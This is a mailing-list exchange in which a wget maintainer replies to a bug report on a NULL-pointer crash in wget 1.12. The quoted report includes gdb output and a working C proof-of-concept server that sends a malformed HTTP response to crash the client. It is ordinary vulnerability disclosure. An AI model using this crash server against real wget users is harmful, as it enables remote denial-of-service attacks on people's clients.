Thanks for your report. This bug is already fixed in the source repository.
Cheers, Giuseppe Ildar Isaev <[email protected]> writes: > Hi, i downloaded wget-1.12 from ftp://ftp.gnu.org/gnu/wget/wget-1.12.tar.bz2 > > It turns out it has a null pointer dereference bug. This is how it may > be reproduced. > > Expl_for_wget.c (attached) is a small pseudo web server. Compile it and run: > > u...@machine:$ gcc -Wall expl_for_wget.c -o expl_for_wget > u...@machine:$ ./expl_for_wget & > [1] 7330 > u...@machine:$ gdb --args <path_to_wget_install_dir>/bin/wget > http://127.0.0.1:3500/ > GNU gdb 6.8-debian > Copyright (C) 2008 Free Software Foundation, Inc. > License GPLv3+: GNU GPL version 3 or later > <http://gnu.org/licenses/gpl.html> > This is free software: you are free to change and redistribute it. > There is NO WARRANTY, to the extent permitted by law. Type "show copying" > and "show warranty" for details. > This GDB was configured as "i486-linux-gnu"... > (gdb) run > [Thread debugging using libthread_db enabled] > --2010-05-14 22:39:36-- http://127.0.0.1:3500/ > Connecting to 127.0.0.1:3500... connected. > HTTP request sent, awaiting response... [New Thread 0x403a26c0 (LWP 7332)] > > Program received signal SIGSEGV, Segmentation fault. 
> [Switching to Thread 0x403a26c0 (LWP 7332)]
> 0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
> (gdb) bt
> #0 0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
> #1 0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
> #2 0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24,
> proxy=0x0, iri=0x8a27d40) at http.c:1832
> #3 0x08066151 in http_loop (u=0x8a280e8, newloc=0xbffa8dec,
> local_file=0xbffa8dd8, referer=0x0, dt=0xbffa8f24, proxy=0x0,
> iri=0x8a27d40) at http.c:2581
> #4 0x08072798 in retrieve_url (orig_parsed=0x8a280e8,
> origurl=0x8a27dd8 "http://127.0.0.1:3500/", file=0xbffa8f2c,
> newloc=0xbffa8f28, refurl=0x0, dt=0xbffa8f24, recursive=false,
> iri=0x8a27d40, register_status=true) at retr.c:692
> #5 0x0806c46e in main (argc=2, argv=0xbffa9014) at main.c:1294
> (gdb) up
> #1 0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
> 117 return xmemdup (string, strlen (string) + 1);
> (gdb)
> #2 0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24,
> proxy=0x0, iri=0x8a27d40) at http.c:1832
> 1832 hs->message = xstrdup (message);
> (gdb) list
> 1827 resp = resp_new (head);
> 1828
> 1829 /* Check for status line. */
> 1830 message = NULL;
> 1831 statcode = resp_status (resp, &message);
> 1832 hs->message = xstrdup (message);
> 1833 if (!opt.server_response)
> 1834 logprintf (LOG_VERBOSE, "%2d %s\n", statcode,
> 1835 message ? quotearg_style (escape_quoting_style,
> message) : "");
> 1836 else
> (gdb) p message
> $1 = 0x0
>
> One can see that the null pointer dereference occurs at http.c:1832: `message` is
> still NULL after resp_status() returns (presumably because the status line in the
> response cannot be parsed), and wget-1.12 passes it to xstrdup() without checking
> it, so strlen(NULL) faults. Note that line 1834-1835 already guards against a NULL
> `message`; only the xstrdup() call on line 1832 lacks the check. Since the trigger
> is the server's response, any malicious or broken HTTP server can crash the client
> this way: a remote denial of service against wget, but a NULL dereference inside
> strlen() is a plain crash, not by itself a memory-corruption primitive.
> > Best regards, > Ildar > > /* Server code in C */ > //exploit_13 > > #include <sys/types.h> > #include <sys/socket.h> > #include <netinet/in.h> > #include <arpa/inet.h> > #include <stdio.h> > #include <stdlib.h> > #include <string.h> > #include <unistd.h> > > int main(void) > { > struct sockaddr_in stSockAddr; > int sfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); > > if(sfd == -1) > { > perror("can not create socket"); > exit(EXIT_FAILURE); > } > > memset(&stSockAddr, 0, sizeof(struct sockaddr_in)); > > stSockAddr.sin_family = AF_INET; > stSockAddr.sin_port = htons(3500); > inet_pton(AF_INET, "127.0.0.1", &stSockAddr.sin_addr); > > int bindRes = bind(sfd, (const struct sockaddr*)&stSockAddr, sizeof(struct > sockaddr_in)); > > if(bindRes == -1) > { > perror("error bind failed"); > close(sfd); > exit(EXIT_FAILURE); > } > > int listenRes = listen(sfd, 10); > > if(listenRes == -1) > { > perror("error listen failed"); > close(sfd); > exit(EXIT_FAILURE); > } > > int cfd = accept(sfd, NULL, NULL); > > char buf[227] = > 
{0x48,0x54,0x54,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0A,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}; > > write(cfd, buf, 227); > close(cfd); > > return 0; > }
